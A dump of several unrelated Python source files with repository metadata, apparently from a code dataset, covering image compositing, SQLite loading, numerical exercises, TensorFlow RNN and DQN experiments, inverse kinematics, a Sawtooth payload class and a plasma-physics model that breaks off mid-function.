# pixelComp(file1="Image\\brightest\\DSC_0456.JPG",
# file2="Image\\brightest\\DSC_0457.JPG", bright=False, filename="darkest2.JPG")
# pixelComp(file1="Image\\brightest\\DSC_0458.JPG",
# file2="Image\\brightest\\DSC_0459.JPG", bright=False, filename="darkest3.JPG")
# pixelComp(file1="Image\\brightest\\DSC_0460.JPG",
# file2="Image\\brightest\\DSC_0461.JPG", bright=False, filename="darkest4.JPG")
# pixelComp(file1="darkest1.JPG",
# file2="darkest2.JPG", bright=False, filename="darkest5.JPG")
# pixelComp(file1="darkest4.JPG",
# file2="darkest3.JPG", bright=False, filename="darkest6.JPG")
# pixelComp(file1="darkest5.JPG",
# file2="darkest3.JPG", bright=False, filename="darkest7.JPG")
# pixelComp(file1="darkest5.JPG",
# file2="darkest6.JPG", bright=False, filename="darkest_final.JPG")
# colorComp(file1="img1.JPG", file2="img2.JPG", filename="darkest.JPG")
start_time = time.time()
for i in range(0,11):
# run_time = time.time()
colorShift("DSC_0063.jpg", shift=25*i)
# print("Run length with " + str(i) + " shift: ", time.time() - run_time)
print("Total Time Elapsed: ", time.time() - start_time)
| true |
a4bbf174a995206a039ffdb77f349472b21c0e8f | Python | aakarshg/HIselector | /Satvik/DB_test.py | UTF-8 | 2,294 | 2.5625 | 3 | [] | no_license | import sqlite3
import csv
def create_db(db_loc, file_loc, tablename):
conn = sqlite3.connect(db_loc)
c = conn.cursor()
with open(file_loc , "r") as f:
reader = csv.reader(f)
header = True
for row in reader:
if header:
header = False
sql = "DROP TABLE IF EXISTS %s" % tablename
c.execute(sql)
sql = "CREATE TABLE %s (%s)" % (tablename, ", ".join(["%s text" % column for column in row]))
c.execute(sql)
for column in row:
if column.lower().endswith("_id"):
index = "%s__%s" % (tablename, column)
sql = "CREATE INDEX %s on %s (%s)" % (index, tablename, column)
c.execute(sql)
insertsql = "INSERT INTO %s VALUES (%s)" % (tablename, ", ".join(["?" for column in row]))
rowlen = len(row)
else:
# skip lines that don't have the right number of columns
if len(row) == rowlen:
c.execute(insertsql, row)
conn.commit()
c.close()
conn.close()
# Table for Plan Attributes
# create_db("C:\\Users\\satvi\\Documents\\GitHub\\HIselector\\preprocessing\\sample.db",
# "C:\\Users\\satvi\\Documents\\DDDM\\Project\\Plan_Attributes_PP2.csv",
# "Plan_Attributes")
# Table for Issuer ID Mapping
# create_db("C:\\Users\\satvi\\Documents\\GitHub\\HIselector\\preprocessing\\sample.db",
# "C:\\Users\\satvi\\Documents\\DDDM\\Project\\IssuerID_Name_Updated.csv",
# "IssuerID_Name_Mapping")
# Table for Ratings
# create_db("C:\\Users\\satvi\\Documents\\GitHub\\HIselector\\preprocessing\\sample.db",
# "C:\\Users\\satvi\\Documents\\DDDM\\Project\\Quality_Ratings_PP1.csv",
# "Ratings")
# Table for Reviews
# create_db("C:\\Users\\satvi\\Documents\\GitHub\\HIselector\\preprocessing\\sample.db",
# "C:\\Users\\satvi\\Documents\\DDDM\\Project\\Review_Table.csv",
# "Reviews")
# Table for BBB Ratings
create_db("C:\\Users\\satvi\\Documents\\GitHub\\HIselector\\preprocessing\\sample.db",
"C:\\Users\\satvi\\Documents\\DDDM\\Project\\BBBRatings.csv",
"BBBRatings") | true |
6909fd5695a7e5f2f8eff93f732a30ab2d3b67cc | Python | carlson9/python-washu-2014 | /day4/recursion.py | UTF-8 | 134 | 3.703125 | 4 | [
"MIT"
] | permissive | def fib(n):
if n <=1:
return n
retun fib(n-1) + fib(n-2)
for i in range(40):
print "{0} : {1}".format(i, fib(i))
| true |
44291f59400165955d9b00d3db4daa72fe1b8a43 | Python | shrukerkar/ML-Fellowship | /PythonLibraries/Numpy/NullVectorSize10SixthValueTo11.py | UTF-8 | 251 | 3.78125 | 4 | [] | no_license |
#Write a Python program to create a null vector of size 10 and update sixth value to 11.
#[ 0. 0. 0. 0. 0. 0. 0. 0. 0. 0.]
#Update sixth value to 11
#[ 0. 0. 0. 0. 0. 0. 11. 0. 0. 0.]
import numpy as np
x=np.zeros(10)
print(x)
x[6]=11
print(x)
| true |
5d7720a4777db322f570615b6fc6cbf1bf28358c | Python | mdddemo/Tensorflow-Project-Template | /mains/predict_main.py | UTF-8 | 1,368 | 2.5625 | 3 | [
"MIT"
] | permissive | # coding=utf-8
import tensorflow as tf
from models.fc_net_model import FCNetModel
from data_loader.data_set_loader import DataSetLoader
from data_loader.data_generator import DataGenerator
from utils.configs import process_config
from utils.logger import Logger
from operators.example_predictor import ExamplePredictor
def predict():
predict_config = process_config("configs/predict.json")
g = tf.Graph()
with g.as_default():
# load data
predict_data_gen = DataGenerator()
data_loader = DataSetLoader(predict_config, {'predict': predict_data_gen}, default_set_name='predict')
next_data = data_loader.next_data
# create an instance of the model you want
model = FCNetModel(predict_config, next_data)
with tf.Session() as sess:
# create tensorboard logger
logger = Logger(sess, predict_config)
# create predictor and pass all the previous components to it
predictor = ExamplePredictor(sess, model, data_loader, predict_config, logger)
# load model if exists
model.load(sess)
# here you use your model to predict
predictor.predict()
def main():
tf.logging.set_verbosity(tf.logging.INFO)
'''predict'''
predict()
tf.logging.info("Congratulations!")
if __name__ == "__main__":
main()
| true |
bbdc865b082b88cb6dd17540122d5e741dd2e6ea | Python | luisutr/Inform-tica-20-21 | /ruben/lab1.py | UTF-8 | 5,944 | 3.90625 | 4 | [] | no_license | # En este archivo deben estar definidas todas las funciones que se piden en el enunciado.
# Si trabajas con otros archivos (por ejemplo archivo1.py y archivo2.py) incluye las funciones de esos archivos en éste así:
# from archivo1 import *
# from archivo2 import *
#1:
##1.1.Primer múltiplo de un número: Implementa la función `primer_multiplo` que recibe como argumentos un número entero `n` y una lista `L`
# de números enteros y devuelve la posición del primer múltiplo de `n` que encuentre en la lista `L`. Si no hay ninguno debe devolver -1.
def primer_multiplo(n,L):
for i in L:
if i % n==0:
return(L.index(i))
return(-1)
##1.2. Función `concatena_lineas`: La función devuelve el resultado de concatenar todas las cadenas insertando un carácter terminador de línea tras cada línea.
def concatena_lineas (c):
r= ""
for e in c:
r= r + e + "\n"
return r
##1.3. Probabilidad de coincidencia en la fecha de cumpleaños: Esta función debe devolver un número real que corresponde a la probabilidad de que
# al menos dos personas de un grupo de n personas cumplan años en el mismo día.
def prob_mismo_cumple (n):
e= 0
p= 1
for e in range(1, n):
p = p * (365 - e) / 365
return (1-p)
##1.4.Suma de serie:
def suma_serie(n):
if n >= 1:
e = 1.0
suma= 0.0
while e<= n:
suma +=(1/e**2)
e += 1
return suma
else:
return 0
##1.5. Números feos: Admite como argumento una secuencia de números enteros. La función debe devolver el primer número feo de la secuencia o bien `None` si no contiene ninguno.
def primer_feo (L):
for e in L:
if feo(e):
return e
def feo(n):
if n == 1:
return False
for d in (2,3,5):
n = divide (n,d)
return n==1
def divide (n, d):
while n%d==0:
n = n//d
return n
##1.6.Suma de dígitos: Devuelve un número entero de una sola cifra, resultante de sumar los dígitos del número mientras el resultado tenga más de un dígito.
import math
def suma_digitos (numero):
c = 11; fin = 0
while c >= 10:
ncifras = 0; resto = 2
while resto > 1:
ncifras += 1
resto = numero / (10**(ncifras))
for e in range (ncifras):
potencia = ncifras - 1 - e
cifra = math.floor (numero/(10**(potencia)))
numero-= cifra * (10**potencia)
numeroSolo = cifra
fin += numeroSolo
c = fin; numero = fin; fin= 0
return numero
##1.7.Números persistentes:
import math
def en_mandelbrot(x,y):
z=0
for e in range (80):
z = z**2 + complex(x,y)
if abs(z)>2:
return False
return True
##1.8.Números persistentes:
import math
def primer_persistente (p):
num = 9 ; g = num ; n = 0
while n != p:
g += 1
num = g
n = 0
fin = 1
while num >=10:
ncifras = 0; resto = 2
while resto >= 1:
ncifras += 1
resto = num / (10**ncifras)
for e in range (ncifras):
potencia = ncifras -1 - e
cifra = math.floor(num / (10**(potencia)))
num = num - cifra * (10**potencia)
solo = cifra
fin *= solo
num = fin ; fin = 1;n += 1
return g
##1.9.Cuadrones fuertes:
from math import sqrt
def primer_cuadron_fuerte ():
for e in range (100000):
if cuadron_fuerte8 (e):
return e
def cuadron_fuerte (e):
s = str(e)
if s[0] != "1":
return False
a = int ('2' + s[1:])
return raiz(e) and raiz(a)
def raiz (x):
e= sqrt (x)%1==0
return e
##1.10.Números ondulantes:
def es_ondulante (n):
z = str(n)
e = [int(e)for e in z]
resta = [a-b for a,b in zip(e,e[1:])]
negativo = [a<0 for a in resta]
if all(negativo[::2]) or all(negativo[1::2]):
return True
return False
##2.1.Derivación de polinomios: Esta funcion calcula la derivada del polinomio que se pasa como argumento.
pol1 = [2,5,2,1]
def polyder(pol):
orden = len(pol)
if orden == 1:
return 0
indices = range(orden)
return [i*j for i,j in zip(pol,indices)][1:]
##2.2.Evaluación de polinomios: Esta funcion evalúa un polinomio `p` para un valor de `x` indicado como segundo argumento.
pol2 = [0,1,1]
var = 3
def polyval(pol, var):
orden = len(pol)
indices = range(orden)
return sum([i*var**j for i,j in zip(pol,indices)])
##2.3.Teorema de Bolzano: (Es un teorema sobre funciones continuas reales definidas sobre un intervalo.
#Intuitivamente, el resultado afirma que, si una función es continua en un intervalo, entonces toma todos los valores intermedios comprendidos entre
#los extremos del intervalo) Utilizamos este teorema para aplicar el método de bisección para calcular una raiz mediante una función `root_bolzano`.
def rng(minimo, maximo):
from random import random
return minimo + random()*(maximo - minimo)
def root_bolzano(pol):
x1 = -abs(max(pol))*2
x2 = abs(max(pol))*2
xa = rng(x1, x2)
while abs(polyval(pol, xa)) > 1e-7:
xa = rng(x1,x2)
if polyval(pol, x1)*polyval(pol, xa) < 0:
x2 = xa
else:
x1 = xa
return xa
##2.4.Newton-Raphson general: Se usa la función para encontrar una raiz cualquiera de un polinomio que se indica como primer argumento con un margen de error que se indica como segundo argumento.
def root_newton_raphson(pol,epsilon):
x1 = -abs(max(pol))*2
x2 = abs(max(pol))*2
xa = rng(x1, x2)
for n in range(0,1000):
if abs(polyval(pol, xa)) < epsilon:
return xa
if polyval(polyder(pol), xa) == 0:
return None
xa = xa - polyval(pol, xa)/polyval(polyder(pol), xa)
return None
| true |
a5cd367b4265dd9d44deaa4281ee7df3390373f0 | Python | www744/rl_impl | /ddqn2.py | UTF-8 | 6,419 | 2.59375 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
import os
import random
import gym
import numpy as np
from collections import deque
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.optimizers import Adam
from tensorflow.keras import backend as K
import logging
import sendmail
"""
Author: Spade
@Time : 2020/5/5
@Email: spadeaiverxin@163.com
"""
EPISODES = 1000
class DQNAgent:
def __init__(self, state_size, action_size):
self.state_size = state_size
self.action_size = action_size
self.memory = deque(maxlen=1000000)
self.gamma = 0.99 # discount rate
self.epsilon = 1.0 # exploration rate
self.epsilon_min = 0.01
self.epsilon_decay = 0.99
self.learning_rate = 0.001
self.model = self._build_model()
self.target_model = self._build_model()
self.update_target_model()
self.batch_size = 64
"""Huber loss for Q Learning
References: https://en.wikipedia.org/wiki/Huber_loss
https://www.tensorflow.org/api_docs/python/tf/keras/losses/Huber
"""
def _build_model(self):
# Neural Net for Deep-Q learning Model
model = Sequential()
model.add(Dense(1000, input_dim=self.state_size, activation='relu'))
model.add(Dense(1000, activation='relu'))
model.add(Dense(self.action_size, activation='linear'))
model.compile(loss='mse',
optimizer=Adam(lr=self.learning_rate))
return model
def update_target_model(self):
# copy weights from model to target_model
self.target_model.set_weights(self.model.get_weights())
def memorize(self, state, action, reward, next_state, done):
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
if np.random.rand() <= self.epsilon:
return random.randrange(self.action_size)
act_values = self.model.predict(state)
return np.argmax(act_values[0]) # returns action
def replay(self, batch_size):
minibatch = random.sample(self.memory, batch_size)
states = np.array([i[0] for i in minibatch])
actions = np.array([i[1] for i in minibatch])
rewards = np.array([i[2] for i in minibatch])
next_states = np.array([i[3] for i in minibatch])
dones = np.array([i[4] for i in minibatch])
states = np.squeeze(states)
next_states = np.squeeze(next_states)
# a: batch size x 4
actions_temp = self.model.predict_on_batch(next_states)
actions_temp = np.argmax(actions_temp,axis=1) # bach size
target_f = self.model.predict_on_batch(states) # batch size x 4
# t: batch size x 4
t = self.target_model.predict_on_batch(next_states)
ind = [i for i in range(batch_size)]
t = t[ind,actions_temp]
target = rewards + self.gamma * t * (1-dones)
target_f[ind, actions] = target
self.model.fit(states,target_f,epochs=1,verbose=0)
if self.epsilon > self.epsilon_min:
self.epsilon *= self.epsilon_decay
def load(self, name):
self.model.load_weights(name)
def save(self, name):
self.model.save_weights(name)
def info(self):
return "INFO: DDQN, Random off, seed(0)" + \
"batch size:" + str(self.batch_size)+ \
"learning rate:" + str(self.learning_rate)
if __name__ == "__main__":
logFileName = './logging.txt'
env = gym.make('LunarLander-v2')
env.seed(0)
np.random.seed(0)
state_size = env.observation_space.shape[0]
action_size = env.action_space.n
agent = DQNAgent(state_size, action_size)
done = False
logging.basicConfig(filename=logFileName, filemode='w', level=logging.INFO, format='%(asctime)s - %(message)s',
datefmt='%d-%b-%y %H:%M:%S')
print(agent.info())
logging.info(agent.info())
checkpoint_dir = './checkpoint_ddqn/'
try:
fileList = os.listdir(checkpoint_dir)
maxNum = 0
for f in fileList:
if maxNum < int(f):
maxNum = int(f)
agent.load(checkpoint_dir + str(maxNum))
agent.epsilon = 0.01
print("load the chekpoint of {}".format(maxNum))
except Exception as err:
print('no backup')
done = False
loss = 0.1
e = maxNum
while e < EPISODES:
e += 1
state = env.reset()
state = np.reshape(state, [1, state_size])
if e == int(EPISODES * 0.3):
sendmail.send('30% finished!, reward:' + str(total_reward))
if e == int(EPISODES * 0.6):
sendmail.send('60% finished, reward:' + str(total_reward))
if e == int(EPISODES * 0.9):
sendmail.send('90 finished, reward:' + str(total_reward))
if e % 10 == 0:
agent.save(checkpoint_dir + str(e))
print('check point{}'.format(e))
total_reward = 0
for time in range(1000):
# env.render()
# decide action
# action: 0 none , 1 right , 2 down, 3 left
action = agent.act(state)
# do the action and get reaction
next_state, reward, done, _ = env.step(action)
total_reward += reward
# reward
# reward = reward if not done else -100
next_state = np.reshape(next_state, [1, state_size])
# memorize this anction and the real state return from env
agent.memorize(state, action, reward, next_state, done)
state = next_state
if done:
print("episode: {}/{}, step: {} - e: {:.2} - coordinate:{:.3},{:.3} - reward:{:.5}"
.format(e, EPISODES, time, agent.epsilon, state[0, 0], state[0, 1], total_reward))
logging.info("episode: {}/{} - step: {}, e: {:.2} - coordinate:{:.3},{:.3} - reward:{:.5}"
.format(e, EPISODES, time, agent.epsilon, state[0, 0], state[0, 1], total_reward))
break
if len(agent.memory) > agent.batch_size:
loss = agent.replay(agent.batch_size)
agent.update_target_model()
agent.save("./train_output/weights.h5")
sendmail.send('Dear sir, the'
' training mission has finished, please check it ^_^') | true |
26f174c77a51076f17c02e29a88199a207a01f8d | Python | sakshi-dhamija/IntroToRobotics | /assign5.py | UTF-8 | 2,308 | 3.3125 | 3 | [] | no_license | # 3 link RRR planar manipulator
import numpy as np
import math
from operator import add, sub
def euclidean(lst1, lst2):
lst = list(map(sub, lst2, lst1))
lst = [i ** 2 for i in lst]
return math.sqrt(sum(lst))
def scalarMul(scalar, list):
lst = [scalar * i for i in list]
return lst
inital_position = np.zeros(shape=(4, 2))
print("Enter initial position of manipulator and end effector")
for i in range(4):
print("Enter {} coordinate: ".format(i + 1))
inital_position[i][0], inital_position[i][1] = list(map(float, input().split()))
goal = list(map(float, input("Enter coordinates of goal: ").split()))
print("iteration begins.....")
link_lengths = []
tol = 0.01
for i in range(inital_position.shape[0] - 1):
link_lengths.append(euclidean(inital_position[i + 1], inital_position[i]))
diff = euclidean(goal, inital_position[0])
itr = 0
if (diff > sum(link_lengths)):
print("not reachable")
for i in range(inital_position.shape[0] - 1):
# finding distance between target and join
r = euclidean(goal, inital_position[i])
lamb = link_lengths[i] / r
inital_position[i + 1] = list(map(add, ((1 - lamb) * inital_position[i]), scalarMul(lamb, goal)))
print(inital_position[3])
else:
# if the target is reachable
b = np.copy(inital_position[0])
curr_tol = euclidean(goal, inital_position[3])
while (curr_tol > tol):
inital_position[3] = goal
# Traveling backward
for i in range(inital_position.shape[0] - 2, -1, -1):
r = euclidean(inital_position[i + 1], inital_position[i])
lamb = link_lengths[i] / r
inital_position[i] = list(
map(add, (1 - lamb) * inital_position[i + 1], scalarMul(lamb, inital_position[i])))
# Traveling forward
inital_position[0] = b
for i in range(inital_position.shape[0] - 1):
r = euclidean(inital_position[i + 1], inital_position[i])
lamb = link_lengths[i] / r
inital_position[i + 1] = list(
map(add, (1 - lamb) * inital_position[i], scalarMul(lamb, inital_position[i + 1])))
curr_tol = euclidean(goal, inital_position[3])
itr += 1
print("iteration: ", itr)
print(curr_tol)
print(inital_position[3])
| true |
52bf6efe0b20cf24fc47b2844e37af055dbc1765 | Python | dlambright/stats-reader | /LogReg.py | UTF-8 | 1,542 | 2.640625 | 3 | [] | no_license | import numpy as np
from scipy.special import expit
def mapFeature(X1, X2):
degree = 6
out = np.ones([X1.shape[1],1], dtype = float)
def sigmoid(matrix):
matrix = expit(matrix)
return matrix
def getYInverse(y):
for x in range(0, y.shape[0]):
if y[x] == 1:
y[x] = 0
else:
y[x] = 1
return y
def getCostFunctionGradient(theta, X, y):
#theta = [37, 1]
#X = [135, 37]
#y = [135, 1]
#print 'theta ' + str(theta.shape)
#print 'X ' + str(X.shape)
#print 'y ' + str(y.shape)
m = y.shape[0]
#print m
h = sigmoid(X * theta)
#print 'h ' + str(h.shape)
grad = (X.transpose()* (h-y)) / m
#print 'grad ' + str(grad.shape)
#print grad
return grad
def getCostFunctionJ(theta, X, y):
yInverse = getYInverse(y)
m = y.shape[0]
h = sigmoid(X * theta)
J = ((y.transpose() * np.log(h)) + (yInverse.transpose() * np.log(1-h))) / m
print J
return J
def logisticRegression(theta, alpha, X, y):
m = y.shape
theta = theta - (alpha/m)
def costFunctionReg(theta, X, y, lambdaa):
# J = 0;
# grad = zeros(size(theta));
#
# h = sigmoid(X * theta);#
# J = (-1/m) * ((y.transpose() * log(h)) + (!y.transpose() * log(1-h))) + ((lambdaa/(2*m)) * sum(theta([2:rows(theta)]).^2));
# theta(1) = 0;
# grad = (1/m * (X'*(h-y))) + ((lambda/m) * theta); %theta([2:rows(theta)]));
return .5
| true |
a0ce82227375faf4209921a6408038e43dc9b175 | Python | zuobangbang/workspace | /tensorflow---/rnn/rnn.py | UTF-8 | 2,843 | 2.9375 | 3 | [] | no_license | #单层rnn
import tensorflow as tf
import numpy as np
# n_steps = 2
# n_inputs = 3
# n_neurons = 5
#
# X = tf.placeholder(tf.float32, [None, n_steps, n_inputs])
# basic_cell = tf.contrib.rnn.BasicRNNCell(num_units=n_neurons)
#
# seq_length = tf.placeholder(tf.int32, [None])
# outputs, states = tf.nn.dynamic_rnn(basic_cell, X, dtype=tf.float32,
# sequence_length=seq_length)
#
# init = tf.global_variables_initializer()
#
# X_batch = np.array([
# # step 0 step 1
# [[0, 1, 2], [9, 8, 7]], # instance 1
# [[3, 4, 5], [0, 0, 0]], # instance 2 (padded with zero vectors)
# [[6, 7, 8], [6, 5, 4]], # instance 3
# [[9, 0, 1], [3, 2, 1]], # instance 4
# ])
# seq_length_batch = np.array([2, 1, 2, 2])
#
# with tf.Session() as sess:
# init.run()
# outputs_val, states_val = sess.run(
# [outputs, states], feed_dict={X: X_batch, seq_length: seq_length_batch})
# print("outputs_val.shape:", outputs_val.shape, "states_val.shape:", states_val.shape)
# print("outputs_val:", outputs_val, "states_val:", states_val)
#多层rnn
import numpy as np
n_steps = 2
n_inputs = 3
n_neurons = 5
n_layers = 3
X = tf.placeholder(tf.float32, [None, n_steps, n_inputs])
seq_length = tf.placeholder(tf.int32, [None])
layers = [tf.contrib.rnn.BasicRNNCell(num_units=n_neurons,
activation=tf.nn.relu)
for layer in range(n_layers)]
multi_layer_cell = tf.contrib.rnn.MultiRNNCell(layers)
outputs, states = tf.nn.dynamic_rnn(multi_layer_cell, X, dtype=tf.float32, sequence_length=seq_length)
init = tf.global_variables_initializer()
X_batch = np.array([
# step 0 step 1
[[0, 1, 2], [9, 8, 7]], # instance 1
[[3, 4, 5], [0, 0, 0]], # instance 2 (padded with zero vectors)
[[6, 7, 8], [6, 5, 4]], # instance 3
[[9, 0, 1], [3, 2, 1]], # instance 4
])
seq_length_batch = np.array([2, 1, 2, 2])
with tf.Session() as sess:
init.run()
outputs_val, states_val = sess.run(
[outputs, states], feed_dict={X: X_batch, seq_length: seq_length_batch})
print("outputs_val.shape:", outputs, "states_val.shape:", states)
print("outputs_val:", outputs_val)
print("states_val:", states_val)
import tensorflow as tf
a = [[1,2,3],[4,3,6]]
b = [[1,0,3],[1,5,1]]
with tf.Session() as sess:
print(sess.run(tf.equal(a,b)))
print(sess.run(tf.cast(tf.equal(a, b),tf.float32)))
print(sess.run(tf.reduce_mean(tf.cast(tf.equal(a, b), tf.float32))))
#多层rnn
# words = tf.placeholder(tf.int32, [batch_size, num_steps])
# lstm = rnn_cell.BasicLSTMCell(lstm_size)
# stacked_lstm = rnn_cell.MultiRNNCell([lstm] * number_of_layers)
# initial_state = stacked_lstm.zero_state(batch_size, tf.float32)
# outputs, state = tf.nn.dynamic_rnn(stacked_lstm, inputs= words, initial_state = init_state) | true |
46c4540d948d693622bf18ac86f550afa63801c8 | Python | beachcoder25/Interview-Questions | /stringManipulation/1.10 - Binary to String/binaryFlip.py | UTF-8 | 433 | 3.6875 | 4 | [] | no_license | import math
def complement(n):
s = ''
i = math.floor(math.log(n, 2))
while n > 0:
if 2**i <= n:
s += '1'
n -= 2**i
else:
s += '0'
i -= 1
for x in range(i+1):
s += '0'
print('Binary:', s)
comp = 0
for i in range(len(s)):
if s[len(s)-i-1] == '0':
comp += 2**(i)
return comp
n = 10
print(complement(n))
| true |
80ce571fb67484dbc990b12e2f2d138f5a5570c0 | Python | annakuchko/DataEngineering | /Python-Basics/HW2_types/2.py | UTF-8 | 754 | 4.09375 | 4 | [] | no_license | # 2. Для списка реализовать обмен значений соседних элементов, т.е. Значениями
# обмениваются элементы с индексами 0 и 1, 2 и 3 и т.д. При нечетном количестве
# элементов последний сохранить на своем месте. Для заполнения списка элементов
# необходимо использовать функцию input().
my_list = (input('Input elements of list separated by comma')).split(',')
if len(my_list)//2==0:
r = len(my_list)
else:
r = len(my_list)-1
for i in range(0,r,2):
my_list[i], my_list[i+1] = my_list[i+1], my_list[i]
print(my_list)
| true |
cafdbbb2863fb05c8deaff35362f0eeedd4deb2e | Python | theblackhawk2/Scalian-Blockchain | /Sawtooth_Project/Assets/Assets_tp/asset_payload.py | UTF-8 | 1,200 | 2.796875 | 3 | [] | no_license | from sawtooth_sdk.processor.exceptions import InvalidTransaction
class AssetPayload:
def __init__(self, payload):
try:
#Make the format of the payload , csv utf-8 encoded
name, serie, action, new_owner = payload.decode().split(',')
except ValueError:
raise InvalidTransaction("[-] Encodage de payload incorrect !")
if not serie:
raise InvalidTransaction("[-] Nom de bien requis ")
if not action:
raise InvalidTransaction("[-] Action requise")
if action not in ('create', 'transfer','destroy'):
raise InvalidTransaction("[-] L'action choisie est invalide")
if action == "transfer":
if new_owner is None:
raise InvalidTransaction("[-] Renseignez un destinataire pour recevoir le bien")
self._name = name
self._serie = serie
self._action = action
self._new_owner = new_owner
@staticmethod
def from_bytes(payload):
return AssetPayload(payload = payload)
@property
def name(self):
return self._name
@property
def serie(self):
return self._serie
@property
def action(self):
return self._action
@property
def new_owner(self):
return self._new_owner
| true |
621746300401d1961c4772f1c1b634598907a44a | Python | kunalsanwalka/bapsf_test_files | /tokamak_plasma_ns_18.py | UTF-8 | 10,075 | 2.890625 | 3 | [] | no_license | """
This program is a copy of the tokamak_plasma_ns.py file that is used in the Petra-M simulations.
The number at the end of the file indicates which test_geom it was taken from.
The following lines are commented out as they are only useful/available when working with Petra-M
from petram.helper.variables import variable
@variable.array(complex = True, shape=(3,3))
NOTE: Check the following things when sending the file back to solver-
1. Uncomment the lines mentioned above (THE PROGRAM WILL NOT RUN WITHOUT THIS STEP).
2. Remove any print or plot lines from the functions as I am not sure how the solver handles these issues.
3. If possible, only edit one function at a time and test by runnning a simulation.
4. Comment out/delete the line which defines the frequency (THIS OVERRIDES THE VALUE DEFINED IN THE MODEL EDITOR)
"""
import numpy as np
import matplotlib.pyplot as plt
#from petram.helper.variables import variable
#Variables imported from the model description
#freq: Frequency of the antenna (fundamental frequency at which the simulation is being solved
freq=250*1000#KHz
#Equilibrium Values (help define the density function)
fwhm=0.3 #FWHM
bMag0=0.05 #Magnetic Field Strength
a=15 #Steepness of the dropoff
#Simulation Constants
w=freq*2*np.pi #Angular frequency of the antenna
#Universal Constants
eps_0=8.85418782e-12 #Vacuum Permittivity
q_e=-1.60217662e-19 #Electron Charge
q_p=1.60217662e-19 #Proton Charge
m_e=9.10938356e-31 #Electron Mass
m_amu=1.66053906660e-27 #Atomic Mass Unit
def Bfield(x, y, z):
"""
Calculates the magnetic field vector at a given point
Args:
x,y,z: Position in the plasma (float)
Returns:
B: Magnetic Field Vector (array)
"""
#Current field is a constant 1kG along the length of the chamber
B=[0,0,0.1] #Calculations are done in Tesla
return B
def magneticField(x,y,z):
"""
Calculates the magnetic field vector at a given point.
Only used for the density() function as that way, we can treat the density and B field strength as independent variables.
Args:
x,y,z: Position in the plasma (float)
Returns:
B: Magnetic Field Vector (array)
"""
B=[0,0,0]
#Scratch field
#Goes from 500G to 1600G over 2m
B[2]=(0.11/2)*(np.tanh(z)+1)+0.05
return B
def Bnorm(x,y,z,forDens=False):
"""
Calculates the magnitude of the magnetic field at a given point
Args:
x,y,z: Position in the plasma (float)
forDens: If this function is being used for the density() function (boolean)
Returns:
Magnitude of the magnetic field (B) vector
"""
if forDens==True:
Bx,By,Bz=magneticField(x,y,z)
return np.sqrt(Bx**2+By**2+Bz**2)
else:
Bx,By,Bz=Bfield(x,y,z)
return np.sqrt(Bx**2+By**2+Bz**2)
def densityConst(x,y,z):
"""
Calculates the density of the plasma at a given point
Note: There is no axial variation in this density function
This function was created for debugging purposes
Args:
x,y,z: Position at which we need to calculate the density (float)
Returns:
dens: Density of the plasma at a given (x,y,z) (float)
"""
#Base Case
dens=0
#Base Density
densBase=1e18
#Radial Distance
r=np.sqrt(x**2+y**2)
#Density
dens=densBase*(np.tanh(-a*(r-fwhm))+1)/2
return dens
def density(x,y,z):
"""
Calculates the density of the plasma at a given point
Args:
x,y,z: Position at which we need to calculate the density (float)
Returns:
dens: Density of the plasma at a given (x,y,z) (float)
"""
#Base Case
dens=0
#Base Density
densBase=1e18
#Magnetic Field magnitude
bMag=Bnorm(x,y,z)
#Radial Distance
r=np.sqrt(x**2+y**2)
#Mirror ratio
mRatio=np.sqrt(bMag/bMag0)
#Density
dens=densBase*(np.tanh(-a*(mRatio*r-fwhm))+1)/2
#Rescale density so that we maintain the same number of particles
#Based on an analytical integral of the radial density function
#Integration limit
intLim=10
#Numerator
coshVal=np.cosh(a*(fwhm+intLim/mRatio))
sechVal=1/np.cosh(a*(fwhm-intLim/mRatio))
num=np.log(coshVal*sechVal)
#Denominator
coshVal=np.cosh(a*(fwhm+intLim))
sechVal=1/np.cosh(a*(fwhm-intLim))
den=np.log(coshVal*sechVal)
#Rescale
rescaleFac=num/(den*mRatio)
dens/=rescaleFac
return dens
def collisionality(x,y,z):
"""
This function calculates the collisionality as a function of the position in the plasma
Args:
x,y,z: Position in the plasma
Returns:
col: Collisionality (float)
"""
#Initialize col
col=4*1e6 #MHz #Base case collisionality
#col is uniform through most of the plasma
if z<=9 and z>=-9:
return col
#Ramp the collisionality at the end to make sure all the wave energy is absorbed before it hits the walls
elif z>9:
#Quadratic ramp for the collisionality
zLoc=z-9 #Work in local co-ordinates
col+=1e8*(zLoc**2) #Ramps to 100MHz
elif z<-9:
#Quadratic ramp for the collisionality
zLoc=-z-9 #Work in local co-ordinates
col+=1e8*(zLoc**2) #Ramps to 100MHz
return col
def PML(r,co_ord):
"""
This function find the value of S_r, the PML co-ordinate stretch that allows for damping.
Args:
r: Value of the unstretched co-ordinate (float)
co_ord: Name of the co-ordinate being stretched (string)
Returns:
S_r: Stretched co-ordinate
"""
#We are only stretching the z-co-ordinate for now
if co_ord=='z':
#PML is from -12 to -10 and from 10 to 12
#Initialize S_r
S_r=1
if r>0:
#Postive Region PML
#Take the absolute value of r
rAbs=np.abs(r)
#Define L_r and L_PML (define where the PML begins and ends)
PMLbegin=10#m (LAPD is 20m long)
PMLend=12#m (PML Layer is 2m long)
#Define S_r' and S_r'' (the real and complex stretch respectively)
realStretch=(25*(rAbs-PMLbegin))**5 #Damps evanescent waves
complexStretch=(25*(rAbs-PMLbegin))**5 #Damps real waves
#Define p_r (ramping factor)
rampFact=2
#Calculate S_r
if rAbs>PMLbegin:
S_r=1+(realStretch+1j*complexStretch)*(((rAbs-PMLbegin)/PMLend)**rampFact)
else:
#Negative Region PML
#Take the absolute value of r
rAbs=np.abs(r)
#Define L_r and L_PML (define where the PML begins and ends)
PMLbegin=10#m (LAPD is 20m long)
PMLend=12#m (PML Layer is 2m long)
#Define S_r' and S_r'' (the real and complex stretch respectively)
realStretch=(25*(rAbs-PMLbegin))**5 #Damps evanescent waves
complexStretch=(25*(rAbs-PMLbegin))**5 #Damps real waves
#Define p_r (ramping factor)
rampFact=2
#Calculate S_r
if rAbs>PMLbegin:
S_r=1+(realStretch-1j*complexStretch)*(((rAbs-PMLbegin)/PMLend)**rampFact)
return S_r
else:
return 1
#@variable.array(complex = True, shape=(3,3))
def epsilonr_pl(x, y, z):
"""
Calculates the plasma di-electric tensor at a given point in the plasma.
Based on the cold plasma approximation.
Note: A lot of the code here is commented out as it was written for a collisional plasma in a tokamak.
Args:
